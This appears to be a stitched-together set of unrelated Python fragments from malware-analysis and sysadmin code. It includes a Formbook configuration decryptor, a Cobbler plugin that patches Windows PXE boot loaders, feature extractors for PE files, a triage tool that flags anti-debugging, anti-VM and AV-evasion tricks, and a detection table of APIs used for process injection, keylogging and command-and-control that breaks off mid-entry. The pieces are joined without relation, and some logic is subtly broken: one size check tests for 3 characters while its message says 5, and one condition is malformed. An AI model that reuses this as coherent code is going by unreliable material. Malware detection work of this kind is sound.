key1 = data[key1_offset:key1_offset + (0x14 * 2)]
offset += 23
key2_offset = unpack("=I",
data[offset:offset + 4])[0] + offset + 11
key2 = data[key2_offset:key2_offset + (0x14 * 2)]
offset += 21
config_size = unpack("=I", data[offset:offset + 4])[0]
offset += 5
config_offset = unpack(
"=I", data[offset:offset + 4])[0] + offset + 11
config = data[config_offset:config_offset + (config_size * 2)]
offset += 33
url_size = unpack("b", data[offset])[0]
for pattern in STRINGS_PATTERNS:
offset = re.search(pattern, data).start()
offset += 19
strings_size = unpack("=I", data[offset:offset + 4])[0]
offset += 5
strings_offset = unpack(
"=I", data[offset:offset + 4])[0] + offset + 11
strings_data = data[strings_offset:strings_offset +
(strings_size * 2)]
for pattern in HASHS_PATTERNS:
offset = re.search(pattern, data).start()
offset += 1
hashs_size = unpack("=I", data[offset:offset + 4])[0]
offset += 11
hashs_offset = unpack("=I",
data[offset:offset + 4])[0] + offset + 11
hashs_data = data[hashs_offset:hashs_offset + (hashs_size * 2)]
config_data.append(
self.formbook_decrypt(key1, key2, config, config_size,
strings_data, strings_size, url_size,
hashs_data, hashs_size))
yield task, vad_base_addr, end, hit, memory_model, config_data
break
def run(api, args, logger):
distros = api.distros()
profiles = api.profiles()
templ = templar.Templar(api._collection_mgr)
template_win = open(post_inst_cmd_template_name)
tmpl_data = template_win.read()
template_win.close()
for distro in distros:
if distro.breed == "windows":
meta = utils.blender(api, False, distro)
if "post_install" in distro.kernel_options:
data = templ.render(tmpl_data, meta, None, distro)
pi_file = open(distro.kernel_options["post_install"], "w+")
pi_file.write(data)
pi_file.close()
template_win = open(sif_template_name)
tmpl_data = template_win.read()
template_win.close()
template_start = open(startnet_template_name)
tmplstart_data = template_start.read()
template_start.close()
logger.info("\nWindows profiles:")
for profile in profiles:
distro = profile.get_conceptual_parent()
if distro.breed == "windows":
logger.info('Profile: ' + profile.name)
meta = utils.blender(api, False, profile)
(distro_path, pxeboot_name) = os.path.split(distro.kernel)
if "sif" in profile.kernel_options:
data = templ.render(tmpl_data, meta, None, profile)
if distro.os_version in ("7", "2008", "8", "2012", "2016",
"2019", "10"):
sif_file_name = os.path.join(distro_path, 'sources',
profile.kernel_options["sif"])
else:
sif_file_name = os.path.join(distro_path,
profile.kernel_options["sif"])
sif_file = open(sif_file_name, "w+")
sif_file.write(data)
sif_file.close()
logger.info('Build answer file: ' + sif_file_name)
if "pxeboot" in profile.kernel_options and "bootmgr" in profile.kernel_options:
wk_file_name = os.path.join(distro_path,
profile.kernel_options["pxeboot"])
wl_file_name = os.path.join(distro_path,
profile.kernel_options["bootmgr"])
logger.info("Build PXEBoot: " + wk_file_name)
if distro.os_version in ("7", "2008", "8", "2012", "2016",
"2019", "10"):
if len(profile.kernel_options["bootmgr"]) != 11:
logger.error(
"The loader name should be EXACTLY 11 character")
return 1
if "bcd" in profile.kernel_options:
if len(profile.kernel_options["bcd"]) != 3:
logger.error(
"The BCD name should be EXACTLY 5 character")
return 1
tl_file_name = os.path.join(distro_path, 'bootmgr.exe')
pat1 = re.compile(br'bootmgr\.exe', re.IGNORECASE)
pat2 = re.compile(br'(\\.B.o.o.t.\\.)(B)(.)(C)(.)(D)',
re.IGNORECASE)
bcd_name = 'BCD'
if "bcd" in profile.kernel_options:
bcd_name = profile.kernel_options["bcd"]
bcd_name = bytes(
"\\g<1>" + bcd_name[0] + "\\g<3>" + bcd_name[1] +
"\\g<5>" + bcd_name[2], 'utf-8')
data = open(tl_file_name, 'rb').read()
out = pat2.sub(bcd_name, data)
else:
if len(profile.kernel_options["bootmgr"]) != 5:
logger.error(
"The loader name should be EXACTLY 5 character")
return 1
if len(profile.kernel_options["sif"]) != 9:
logger.error(
"The response should be EXACTLY 9 character")
return 1
tl_file_name = os.path.join(distro_path, 'setupldr.exe')
pat1 = re.compile(br'NTLDR', re.IGNORECASE)
pat2 = re.compile(br'winnt\.sif', re.IGNORECASE)
data = open(tl_file_name, 'rb').read()
out = pat2.sub(
bytes(profile.kernel_options["sif"], 'utf-8'), data)
logger.info('Build Loader: ' + wl_file_name)
if out != data:
open(wl_file_name, 'wb+').write(out)
if distro.os_version in ("7", "2008", "8", "2012", "2016",
"2019", "10"):
pe = pefile.PE(wl_file_name, fast_load=True)
pe.OPTIONAL_HEADER.CheckSum = pe.generate_checksum()
pe.write(filename=wl_file_name)
data = open(distro.kernel, 'rb').read()
out = pat1.sub(
bytes(profile.kernel_options["bootmgr"], 'utf-8'), data)
if out != data:
open(wk_file_name, 'wb+').write(out)
if "bcd" in profile.kernel_options:
obcd_file_name = os.path.join(distro_path, 'boot', 'BCD')
bcd_file_name = os.path.join(distro_path, 'boot',
profile.kernel_options["bcd"])
wim_file_name = 'winpe.wim'
if "winpe" in profile.kernel_options:
wim_file_name = profile.kernel_options["winpe"]
if distro.boot_loader == "ipxe":
wim_file_name = '\\Boot\\' + wim_file_name
sdi_file_name = '\\Boot\\' + 'boot.sdi'
else:
wim_file_name = os.path.join('/winos', distro.name, 'boot',
wim_file_name)
sdi_file_name = os.path.join('/winos', distro.name, 'boot',
'boot.sdi')
logger.info('Build BCD: ' + bcd_file_name + ' for ' +
wim_file_name)
bcdedit(obcd_file_name, bcd_file_name, wim_file_name,
sdi_file_name)
if "winpe" in profile.kernel_options:
ps_file_name = os.path.join(distro_path, "boot",
profile.kernel_options["winpe"])
if distro.os_version in ("7", "2008"):
wim_pl_name = wim7_template_name
elif distro.os_version in ("8", "2012", "2016", "2019", "10"):
wim_pl_name = wim8_template_name
cmd = "/usr/bin/cp --reflink=auto " + wim_pl_name + " " + ps_file_name
utils.subprocess_call(logger, cmd, shell=True)
if os.path.exists(wimupdate):
data = templ.render(tmplstart_data, meta, None, profile)
pi_file = tempfile.NamedTemporaryFile()
pi_file.write(bytes(data, 'utf-8'))
pi_file.flush()
cmd = wimupdate + ' ' + ps_file_name + ' --command="add ' + pi_file.name + ' /Windows/System32/startnet.cmd"'
utils.subprocess_call(logger, cmd, shell=True)
pi_file.close()
return 0
def preprocessPEs(pePaths):
mlInputs = []
# Get percentage opcode composition of file assembley code for the top 50 most common opcodes
# in each file
opCodeSet = set()
opCodeDicts = []
opCodeFreqs = {}
count = 1
for sample in pePaths:
try:
pe = pefile.PE(sample, fast_load=True)
entryPoint = pe.OPTIONAL_HEADER.AddressOfEntryPoint
data = pe.get_memory_mapped_image()[entryPoint:]
cs = Cs(CS_ARCH_X86, CS_MODE_32)
opcodes = []
for i in cs.disasm(data, 0x1000):
opcodes.append(i.mnemonic)
opcodeDict = {}
total = len(opcodes)
opCodeSet = set(list(opCodeSet) + opcodes)
for opcode in opCodeSet:
freq = 1
for op in opcodes:
if opcode == op:
freq += 1
try:
opCodeFreqs[opcode] += freq
except:
opCodeFreqs[opcode] = freq
opcodeDict[opcode] = round((freq / total) * 100, 2)
opCodeDicts.append(opcodeDict)
count += 1
except Exception as e:
print(e)
opCodeFreqsSorted = np.genfromtxt("top50opcodes.csv",
delimiter=",",
dtype="str")[1:, 0]
count = 0
for opDict in opCodeDicts:
opFreqVec = []
for opcode in opCodeFreqsSorted[:50]:
try:
opFreqVec.append(opDict[opcode])
except Exception as e:
if str(type(e)) == "<class 'KeyError'>":
opFreqVec.append(0.0)
mlInputs.append([np.array(opFreqVec)])
count += 1
# Get words from utf-8 strings decoded from raw bytes of files,
# and hash to vectors of integers
sequences = []
count = 0
for sample in pePaths:
sequences.append(wordSequence(sample))
count += 1
with open("finalVocabSize.txt", "r") as f:
maxVocabSize = int(f.readline())
hashSeqs = hashWordSequences(sequences, 10000, maxVocabSize)
count = 0
for hashSeq in hashSeqs:
mlInputs[count].append(np.array(hashSeq))
count += 1
mlInputs = np.array(mlInputs)
return mlInputs
def extract_infos(fpath):
res = {}
pe = pefile.PE(fpath)
res['Machine'] = pe.FILE_HEADER.Machine
res['SizeOfOptionalHeader'] = pe.FILE_HEADER.SizeOfOptionalHeader
res['Characteristics'] = pe.FILE_HEADER.Characteristics
res['MajorLinkerVersion'] = pe.OPTIONAL_HEADER.MajorLinkerVersion
res['MinorLinkerVersion'] = pe.OPTIONAL_HEADER.MinorLinkerVersion
res['SizeOfCode'] = pe.OPTIONAL_HEADER.SizeOfCode
res['SizeOfInitializedData'] = pe.OPTIONAL_HEADER.SizeOfInitializedData
res['SizeOfUninitializedData'] = pe.OPTIONAL_HEADER.SizeOfUninitializedData
res['AddressOfEntryPoint'] = pe.OPTIONAL_HEADER.AddressOfEntryPoint
res['BaseOfCode'] = pe.OPTIONAL_HEADER.BaseOfCode
try:
res['BaseOfData'] = pe.OPTIONAL_HEADER.BaseOfData
except AttributeError:
res['BaseOfData'] = 0
res['ImageBase'] = pe.OPTIONAL_HEADER.ImageBase
res['SectionAlignment'] = pe.OPTIONAL_HEADER.SectionAlignment
res['FileAlignment'] = pe.OPTIONAL_HEADER.FileAlignment
res['MajorOperatingSystemVersion'] = pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
res['MinorOperatingSystemVersion'] = pe.OPTIONAL_HEADER.MinorOperatingSystemVersion
res['MajorImageVersion'] = pe.OPTIONAL_HEADER.MajorImageVersion
res['MinorImageVersion'] = pe.OPTIONAL_HEADER.MinorImageVersion
res['MajorSubsystemVersion'] = pe.OPTIONAL_HEADER.MajorSubsystemVersion
res['MinorSubsystemVersion'] = pe.OPTIONAL_HEADER.MinorSubsystemVersion
res['SizeOfImage'] = pe.OPTIONAL_HEADER.SizeOfImage
res['SizeOfHeaders'] = pe.OPTIONAL_HEADER.SizeOfHeaders
res['CheckSum'] = pe.OPTIONAL_HEADER.CheckSum
res['Subsystem'] = pe.OPTIONAL_HEADER.Subsystem
res['DllCharacteristics'] = pe.OPTIONAL_HEADER.DllCharacteristics
res['SizeOfStackReserve'] = pe.OPTIONAL_HEADER.SizeOfStackReserve
res['SizeOfStackCommit'] = pe.OPTIONAL_HEADER.SizeOfStackCommit
res['SizeOfHeapReserve'] = pe.OPTIONAL_HEADER.SizeOfHeapReserve
res['SizeOfHeapCommit'] = pe.OPTIONAL_HEADER.SizeOfHeapCommit
res['LoaderFlags'] = pe.OPTIONAL_HEADER.LoaderFlags
res['NumberOfRvaAndSizes'] = pe.OPTIONAL_HEADER.NumberOfRvaAndSizes
# Sections
res['SectionsNb'] = len(pe.sections)
entropy = list(map(lambda x: x.get_entropy(), pe.sections))
res['SectionsMeanEntropy'] = sum(entropy) / float(len(entropy))
res['SectionsMinEntropy'] = min(entropy)
res['SectionsMaxEntropy'] = max(entropy)
raw_sizes = list(map(lambda x: x.SizeOfRawData, pe.sections))
res['SectionsMeanRawsize'] = sum(raw_sizes) / float(len(raw_sizes))
res['SectionsMinRawsize'] = min(raw_sizes)
res['SectionsMaxRawsize'] = max(raw_sizes)
virtual_sizes = list(map(lambda x: x.Misc_VirtualSize, pe.sections))
res['SectionsMeanVirtualsize'] = sum(virtual_sizes) / float(
len(virtual_sizes))
res['SectionsMinVirtualsize'] = min(virtual_sizes)
res['SectionMaxVirtualsize'] = max(virtual_sizes)
# Imports
try:
res['ImportsNbDLL'] = len(pe.DIRECTORY_ENTRY_IMPORT)
imports = sum([x.imports for x in pe.DIRECTORY_ENTRY_IMPORT], [])
res['ImportsNb'] = len(imports)
res['ImportsNbOrdinal'] = len(
list(filter(lambda x: x.name is None, imports)))
except AttributeError:
res['ImportsNbDLL'] = 0
res['ImportsNb'] = 0
res['ImportsNbOrdinal'] = 0
# Exports
try:
res['ExportNb'] = len(pe.DIRECTORY_ENTRY_EXPORT.symbols)
except AttributeError:
# No export
res['ExportNb'] = 0
# Resources
resources = get_resources(pe)
res['ResourcesNb'] = len(resources)
if len(resources) > 0:
entropy = list(map(lambda x: x[0], resources))
res['ResourcesMeanEntropy'] = sum(entropy) / float(len(entropy))
res['ResourcesMinEntropy'] = min(entropy)
res['ResourcesMaxEntropy'] = max(entropy)
sizes = list(map(lambda x: x[1], resources))
res['ResourcesMeanSize'] = sum(sizes) / float(len(sizes))
res['ResourcesMinSize'] = min(sizes)
res['ResourcesMaxSize'] = max(sizes)
else:
res['ResourcesNb'] = 0
res['ResourcesMeanEntropy'] = 0
res['ResourcesMinEntropy'] = 0
res['ResourcesMaxEntropy'] = 0
res['ResourcesMeanSize'] = 0
res['ResourcesMinSize'] = 0
res['ResourcesMaxSize'] = 0
# Load configuration size
try:
res['LoadConfigurationSize'] = pe.DIRECTORY_ENTRY_LOAD_CONFIG.struct.Size
except AttributeError:
res['LoadConfigurationSize'] = 0
# Version configuration size
try:
version_infos = get_version_info(pe)
res['VersionInformationSize'] = len(version_infos.keys())
except AttributeError:
res['VersionInformationSize'] = 0
return res
def main(exefile):
if len(sys.argv) == 1 or len(sys.argv) >= 3:
help()
exit(0)
if len(sys.argv) == 2 and sys.argv[1] == "-h" or sys.argv[1] == "--help":
help()
exit(0)
if len(sys.argv) == 2:
print module.config.__asciiart__
print "\t\t" + module.config.__copyright__ + " | " + module.config.__author__
print "\t\t\tUnprotect malware for the mass"
try:
exe = pefile.PE(exefile)
except OSError as e:
print(e)
sys.exit()
except pefile.PEFormatError as e:
print module.config.R + "[-] PEFormatError: %s" % e.value
print module.config.R + "[!] The file is not a valid PE"
sys.exit()
strings_list, decoded_strings = get_strings(exefile)
concatenate_strings = strings_list + decoded_strings
print "\nPE Summary"
print "-" * 80
ftype, fname, fsize, tsdate, dll, nsec = get_info(exe, exefile)
print module.config.C + "File type:\t " + module.config.W + "%s" % ftype
print module.config.C + "File name:\t " + module.config.W + "%s" % fname
print module.config.C + "File size:\t " + module.config.W + "%s Bytes" % fsize
print module.config.C + "Compile time:\t " + module.config.W + "%s" % tsdate
print module.config.C + "Entry point:\t " + module.config.W + "0x%.8x" % exe.OPTIONAL_HEADER.AddressOfEntryPoint
print module.config.C + "Image base:\t " + module.config.W + "0x%.8x" % exe.OPTIONAL_HEADER.ImageBase
md5, sha1, ih, hashdeep, sha2, sha5 = get_hash(exe, exefile)
print module.config.C + "Hash MD5:\t " + module.config.W + "%s" % md5
# print module.config.C + "Hash SHA1:\t " + module.config.W + "%s" % sha1
print module.config.C + "Hash SHA2:\t " + module.config.W + "%s" % sha2
# print module.config.C + "Hash SHA5:\t " + module.config.W + "%s" % sha5
print module.config.C + "Import hash:\t " + module.config.W + "%s" % ih
print module.config.C + "Ssdeep:\t\t " + module.config.W + "%s" % hashdeep
impfuzzy = get_impfuzzy(exefile)
print module.config.C + "ImpFuzzy:\t " + module.config.W + "%s" % impfuzzy
mmh = get_mmh(exefile)
print module.config.C + "MinHash:\t " + module.config.W + "%s" % mmh
xored_richhash, clear_richhash = get_richhash(exe, exefile)
print module.config.C + "Xored RicHash:\t " + module.config.W + "%s" % xored_richhash
print module.config.C + "Clear RicHash:\t " + module.config.W + "%s" % clear_richhash
print "\nVirus Total Report"
print "-" * 80
try:
resp_code, scan_date, permalink, positives, total = get_vt(
module.config.APIKEY, exefile)
if resp_code == 1:
print "Scan date:\t %s" % scan_date
print("Detection:\t %s/%s" % (positives, total))
print "Permalink:\t %s" % permalink
else:
print module.config.R + "[-]" + module.config.W + " No Virus Total report available!"
except IOError:
print module.config.R + "[-]" + module.config.W + " Virus Total not available or no connexion found!"
pass
print "\nExploit Mitigation"
print "-" * 80
aslr_check, dep_check, seh_check, cfg_check = get_sec(exe)
if aslr_check:
print module.config.G + "[+]" + module.config.W + " ASLR enabled"
else:
print module.config.R + "[-]" + module.config.W + " ASLR not enabled"
if dep_check:
print module.config.G + "[+]" + module.config.W + " DEP enabled"
else:
print module.config.R + "[-]" + module.config.W + " DEP not enabled"
if seh_check:
print module.config.G + "[+]" + module.config.W + " SEH enabled"
else:
print module.config.R + "[-]" + module.config.W + " SEH not enabled"
if cfg_check:
print module.config.G + "[+]" + module.config.W + " CFG enabled"
else:
print module.config.R + "[-]" + module.config.W + " CFG not enabled"
print "\nFile Metadata"
print "-" * 80
result = get_meta(exe)
if not bool(result):
print module.config.R + "[-]" + module.config.W + " PE file has no metadata available!"
print "\nPacker Detection"
print "-" * 75
peid_detect = get_peid(exe)
if peid_detect:
print module.config.G + "[+]" + module.config.W + " PEiD detection: %s " % peid_detect
else:
print module.config.R + "[-]" + module.config.W + " No PEiD detection!"
pepack, emptysec, enaddr, vbsecaddr, ensecaddr, entaddr = possible_packing(
exe)
if bool(pepack):
print module.config.G + "[+]" + module.config.W + " Sections entropy is high, the binary is possibly packed!"
if bool(emptysec):
print module.config.G + "[+]" + module.config.W + " Non-ascii or empty section names detected"
if enaddr > entaddr:
print module.config.G + "[+]" + module.config.W + " Entry point is outside the .code section, the binary is possibly packed!"
print module.config.G + "[+]" + module.config.W + " PE Sections:"
x = PrettyTable()
x.field_names = ["Section Name", "Virtual Address", "Size", "Entropy"]
for section in exe.sections:
x.add_row([
section.Name.strip(), "0x" + str(section.VirtualAddress),
"0x" + str(section.Misc_VirtualSize),
section.get_entropy()
])
print x
matches = yarascan(exefile, module.config.rule_packer)
if matches is not None:
print module.config.G + "[+] " + module.config.W + "Yara detection: %s" % matches
print "\nAnti-Sandboxing Tricks"
print "-" * 80
trk = get_vm(exefile)
if trk:
print module.config.G + "[+]" + module.config.W + " Anti-sandboxing tricks detected: %s " % str(
trk)
else:
print module.config.R + "[-]" + module.config.W + " No anti-sandboxing tricks detected!"
count = antivm_inst(exe)
if count == 0:
print module.config.R + "[-]" + module.config.W + " No antivm instruction detected!"
else:
print module.config.G + "[+]" + module.config.W + " Number of antivm instruction detected (SIDT, SLDT, CPUID, STR): %s" % count
matches = yarascan(exefile, module.config.rule_antisb)
if matches is not None:
print module.config.G + "[+] " + module.config.W + "Yara detection: %s" % matches
print "\nAnti-Debugging Tricks"
print "-" * 80
try:
tlscallback = check_tls(exe)
if tlscallback:
print(module.config.G + "[+]" + module.config.W +
" TLS Callback found at: 0x%x" % tlscallback)
except:
pass
dbgmatches = get_antidebug(exe, module.config.antidbg_api)
if dbgmatches:
print module.config.G + "[+]" + module.config.W + " Anti-debugging API detected: "
print tabulate(dbgmatches, headers=['Address', 'API']) + "\n"
else:
print module.config.R + "[-]" + module.config.W + " No Anti-debugging API detected!"
matches = yarascan(exefile, module.config.rule_antidbg)
if matches is not None:
print module.config.G + "[+] " + module.config.W + "Yara detection: %s" % matches
print "\nAnti-Virus Evasion Tricks"
print "-" * 80
try:
errorlog, result1, result2, originalname = get_av_evasion(
exe, module.config.lolbin)
except (AttributeError, RuntimeError, TypeError, NameError):
errorlog = False
result1 = False
result2 = False
originalname = False
avdetected = get_av_strings(strings_list, module.config.antiav)
if not bool(errorlog):
if result1 is True:
print module.config.G + "[+]" + module.config.W + " The filename extension is not valid. It might be used to trick the AV!"
print module.config.G + "[+]" + module.config.W + " Original filename: %s " % originalname
else:
print module.config.R + "[-]" + module.config.W + " No trick with the extension!"
if result2 is True:
print module.config.G + "[+]" + module.config.W + " Lolbin filename detected! Possible AV evasion trick!"
print module.config.G + "[+]" + module.config.W + " Original filename: %s " % originalname
else:
print module.config.R + "[-]" + module.config.W + " No Lolbin detected!"
else:
print module.config.R + "[-]" + module.config.W + " No AV evasion tricks detected!"
if avdetected:
print module.config.G + "[+]" + module.config.W + " Potential AV targeted by the sample:"
for av in avdetected:
print "\t" + av
else:
print module.config.R + "[-]" + module.config.W + " No strings related to AV detected!"
bigfile = get_pesize(exefile)
if bigfile:
print module.config.G + "[+]" + module.config.W + " The PE file is bigger than 5MB! Possible AV evasion trick!"
try:
get_crt(exefile)
except:
pass
matches = yarascan(exefile, module.config.rule_antiav)
if matches is not None:
print module.config.G + "[+] " + module.config.W + "Yara detection: %s" % matches
print "\nAnti-Disassembling Tricks"
print "-" * 80
count = garbage_byte(exe)
if count == 0:
print module.config.R + "[-]" + module.config.W + " No garbage byte detected!"
else:
print module.config.G + "[+]" + module.config.W + " Number of potential garbage byte detected: " + module.config.R + "%s" % count
count = fake_jump(exe)
if count == 0:
print module.config.R + "[-]" + module.config.W + " No fake jump detected!"
else:
print module.config.G + "[+]" + module.config.W + " Number of potential fake jump detected: " + module.config.R + "%s" % count
count = flow_redirect(exe)
if count == 0:
print module.config.R + "[-]" + module.config.W + " No flow redirection detected"
else:
print module.config.G + "[+]" + module.config.W + " Number of potential flow redirection detected: " + module.config.R + "%s" % count
count = nop_seq(exe)
if count == 0:
print module.config.R + "[-]" + module.config.W + " No nop sequence detected"
else:
print module.config.G + "[+]" + module.config.W + " Nop sequence detected: " + module.config.R + "%s" % count
iatcount, iatlow = check_iat(exe)
# print iatcount
if iatcount < 5:
print module.config.G + "[+]" + module.config.W + " IAT contains less than 5 imports. Possibly packed or dynamically called!"
if iatcount == 0:
print module.config.G + "[+]" + module.config.W + " IAT is empty! Stealth import of Windows API detected!"
try:
if "loadlibrarya" in iatlow or "loadlibraryw" in iatlow or "loadlibraryexa" in iatlow or "loadlibraryexw" in iatlow and "getprocaddress":
print module.config.G + "[+]" + module.config.W + " Possible function call obfuscation! LoadLibrary and GetProcAddress found in IAT!"
except TypeError:
pass
print "\nProcess Injection Tricks"
print "-" * 80
dbgmatches = get_procinj(exe, module.config.procinj_api)
if dbgmatches:
print module.config.G + "[+]" + module.config.W + " Process injection API detected: "
print tabulate(dbgmatches, headers=['Address', 'API']) + "\n"
else:
print module.config.R + "[-]" + module.config.W + " No process injection API detected!"
matches = yarascan(exefile, module.config.rule_procinject)
if matches is not None:
print module.config.G + "[+] " + module.config.W + "Yara detection: %s" % matches
print "\nObfuscation, Data Encoding"
print "-" * 80
matches = yarascan(exefile, module.config.rule_findcrypt)
if matches is not None:
print module.config.G + "[+] " + module.config.W + "Yara detection: %s" % matches
else:
print module.config.R + "[-] " + module.config.W + "No obfuscation detected!"
if decoded_strings:
print module.config.R + "[+] " + module.config.W + "FLOSS decoded strings:"
# print decoded_strings
for i in decoded_strings:
print "\t" + i
print "\nAnti-Monitoring Tricks"
print "-" * 80
matches = yarascan(exefile, module.config.rule_antimonitoring)
if matches is not None:
print module.config.G + "[+] " + module.config.W + "Yara detection: %s" % matches
else:
print module.config.R + "[-] " + module.config.W + "No anti-monitoring tricks detected!"
print "\nNetwork Evasion Tricks"
print "-" * 80
uniq_iplist = get_ip(str(concatenate_strings))
uniq_urllist = get_url(str(concatenate_strings))
if uniq_iplist:
print module.config.G + "[+] " + module.config.W + "IP addresses found!"
print tabulate(uniq_iplist, headers=['IP', 'Status', 'Location'])
print "\n"
else:
print module.config.R + "[-] " + module.config.W + "No IP address found"
if uniq_urllist:
print module.config.G + "[+] " + module.config.W + "Urls found!"
print tabulate(uniq_urllist, headers=['URLs', 'Fast Flux', 'DGA'])
print "\n"
else:
print module.config.R + "[-] " + module.config.W + "No urls found"
matches = yarascan(exefile, module.config.rule_network_evasion)
if matches is not None:
print module.config.G + "[+] " + module.config.W + "Yara detection: %s" % matches
print "\nAdditional Information"
print "-" * 80
res = display_resources(exe)
if res:
print module.config.G + "[+] " + module.config.W + "Ressources: "
print tabulate(res,
headers=[
'Id', 'Name', 'Size', 'Lang', 'Sublang', 'Type',
'MD5'
])
else:
print module.config.R + "[-] " + module.config.W + "No ressources available"
BTC = []
MNR = []
ETH = []
email = []
for line in concatenate_strings:
if re.match(r'^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$', line):
BTC.append(line)
elif re.match(r'^4([0-9]|[A-B])(.){93}', line):
MNR.append(line)
elif re.match(r'^0x[a-fA-F0-9]{40}$', line):
ETH.append(line)
elif re.match(
r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)',
line):
email.append(line)
if BTC:
print module.config.G + "\n[+] " + module.config.W + "Bitcoin regex matching: "
for i in BTC:
print i
if MNR:
print module.config.G + "\n[+] " + module.config.W + "Monero regex matching: "
for i in MNR:
print i
if ETH:
print module.config.G + "\n[+] " + module.config.W + "Ethereum regex matching: "
for i in ETH:
print i
if email:
print module.config.G + "\n[+] " + module.config.W + "Email regex matching: "
for i in email:
print i
matches = yarascan(exefile, module.config.rules_user)
if matches is not None:
print module.config.G + "\n[+] " + module.config.W + "Matching from user's Yara rules: %s" % matches
print "\n"
print module.config.C + "All done!\n"
def __init__(self, filename):
self.filename = filename
self.pe = pefile.PE(self.filename)
with open(filename, 'rb') as pe_file:
self.pe_entropy = data_entropy(pe_file.read())
self.alerts = { # Practical Malware Analysis (2012) - Sikorski M., Honig A.
'OpenProcess':
"Opens a handle to another process running on the system. This handle can be used to read and write to the other process memory or to inject code into the other process.",
'VirtualAllocEx':
"A memory-allocation routine that can allocate memory in a remote process. Malware sometimes uses VirtualAllocEx as part of process injection",
'WriteProcessMemory':
"Used to write data to a remote process. Malware uses WriteProcessMemory as part of process injection.",
'CreateRemoteThread':
"Used to start a thread in a remote process (one other than the calling process). Launchers and stealth malware use CreateRemoteThread to inject code into a different process.",
'ReadProcessMemory':
"Used to read the memory of a remote process.",
'CreateProcess':
"Creates and launches a new process. If malware creates a new process, you will need to analyze the new process as well.",
'WinExec':
"Used to execute another program. If malware creates a new process, you will need to analyze the new process as well.",
'ShellExecute':
"Used to execute another program. If malware creates a new process, you will need to analyze the new process as well.",
'HttpSendRequest':
"Suggest that the PE file uses HTTP",
'InternetReadFile':
"Reads data from a previously opened URL.",
'InternetWriteFile':
"Writes data to a previously opened URL.",
'InternetConnect':
"PE file uses to establish connection",
'CreateService':
"Creates a service that can be started at boot time. Malware uses CreateService for persistence, stealth, or to load kernel drivers.",
'StartService':
"Starting a service",
'accept':
"Used to listen for incoming connections. This function indicates that the program will listen for incoming connections on a socket.",
'AdjustTokenPrivileges':
"Used to enable or disable specific access privileges. Malware that performs process injection often calls this function to gain additional permissions.",
'VirtualProtectEx':
"Changes the protection on a region of memory. Malware may use this function to change a read-only section of memory to an executable.",
'SetWindowsHookEx':
"Sets a hook function to be called whenever a certain event is called. Commonly used with keyloggers and spyware, this function also provides an easy way to load a DLL into all GUI processes on the system. This function is sometimes added by the compiler.",
'SfcTerminateWatcherThread':
"Used to disable Windows file protection and modify files that otherwise would be protected. SfcFileException can also be used in this capacity.",
'FtpPutFile':
"A high-level function for uploading a file to a remote FTP server.",
'EnumProcesses':
"Used to enumerate through running processes on the system. Malware often enumerates through processes to find a process to inject into.",
'connect':
"Used to connect to a remote socket. Malware often uses low-level functionality to connect to a command-and-control server.",
'GetAdaptersInfo':
"Used to obtain information about the network adapters on the system. Backdoors sometimes call GetAdaptersInfo as part of a survey to gather information about infected machines. In some cases, it’s used to gather MAC addresses to check for VMware as part of anti-virtual machine techniques.",
'GetAsyncKeyState':
"Used to determine whether a particular key is being pressed. Malware sometimes uses this function to implement a keylogger.",
'GetKeyState':
"Used by keyloggers to obtain the status of a particular key on the keyboard.",
'InternetOpen':
"Initializes the high-level Internet access functions from WinINet, such as InternetOpenUrl and InternetReadFile . Searching for InternetOpen is a good way to find the start of Internet access functionality. One of the parameters to InternetOpen is the User-Agent, which can sometimes make a good network-based signature.",
'AttachThreadInput':
"Attaches the input processing for one thread to another so that the second thread receives input events such as keyboard and mouse events. Keyloggers and other spyware use this function.",
'BitBlt':
"Used to copy graphic data from one device to another. Spyware sometimes uses this function to capture screenshots. This function is often added by the compiler as part of library code.",
'CallNextHookEx':
"Used within code that is hooking an event set by SetWindowsHookEx. CallNextHookEx calls the next hook in the chain. Analyze the function calling CallNextHookEx to determine the purpose of a hook set by SetWindowsHookEx.",
'CertOpenSystemStore':
"Used to access the certificates stored on the local system.",
'CheckRemoteDebuggerPresent':
"Checks to see if a specific process (including your own) is being debugged. This function is sometimes used as part of an anti-debugging technique.",
'CoCreateInstance':
"Creates a COM object. COM objects provide a wide variety of functionality. The class identifier (CLSID) will tell you which file contains the code that implements the COM object. See Chapter 7 for an in-depth explanation of COM.",
'ConnectNamedPipe':
"Used to create a server pipe for interprocess communication that will wait for a client pipe to connect. Backdoors and reverse shells sometimes use ConnectNamedPipe to simplify connectivity to a command-and-control server.",
'ControlService':
"Used to start, stop, modify, or send a signal to a running service. If malware is using its own malicious service, you’ll need to analyze the code that implements the service in order to determine the purpose of the call.",
'CreateFile':
"Creates a new file or opens an existing file.",
'CreateFileMapping':
"Creates a handle to a file mapping that loads a file into memory and makes it accessible via memory addresses. Launchers, loaders, and injectors use this function to read and modify PE files.",
'CreateMutex':
"Creates a mutual exclusion object that can be used by malware to ensure that only a single instance of the malware is running on a system at any given time. Malware often uses fixed names for mutexes, which can be good host-based indicators to detect additional installations of the malware.",
'CreateToolhelp32Snapshot':
"Used to create a snapshot of processes, heaps, threads, and modules. Malware often uses this function as part of code that iterates through processes or threads.",
'CryptAcquireContext':
"Often the first function used by malware to initialize the use of Windows encryption. There are many other functions associated with encryption, most of which start with Crypt.",
'DeviceIoControl':
"Sends a control message from user space to a device driver. DeviceIoControl is popular with kernel malware because it is an easy, flexible way to pass information between user space and kernel space.",
'DllCanUnloadNow':
"An exported function that indicates that the program implements a COM server.",
'DllGetClassObject':
"An exported function that indicates that the program implements a COM server.",
'DllInstall':
"An exported function that indicates that the program implements a COM server.",
'DllRegisterServer':
"An exported function that indicates that the program implements a COM server.",
'DllUnregisterServer':
"An exported function that indicates that the program implements a COM server.",
'EnableExecuteProtectionSupport':
"An undocumented API function used to modify the Data Execution Protection (DEP) settings of the host, making it more susceptible to attack.",
'EnumProcessModules':
"Used to enumerate the loaded modules (executables and DLLs) for a given process. Malware enumerates through modules when doing injection.",
'FindFirstFile/FindNextFile':
"Used to search through a directory and enumerate the filesystem.",
'FindResource':
"Used to find a resource in an executable or loaded DLL. Malware some- times uses resources to store strings, configuration information, or other malicious files. If you see this function used, check for a .rsrc section in the malware’s PE header.",
'GetDC':
"Returns a handle to a device context for a window or the whole screen. Spyware that takes screen captures often uses this function.",
'GetForegroundWindow':
